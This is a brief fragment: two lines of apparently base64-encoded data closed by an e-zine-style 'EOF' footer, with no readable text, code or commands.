SaZOiEFYeKlghxct6PLxG/NKshC/TNxJjWTGYJeFlwisWXipkJ5vWzHNr/k1
v+bX/Jpf82t+za/5Nb/m1/yaX/PrDVz/H1KGin8AGAEA
==|=[ EOF ]=---------------------------------------------------------------=|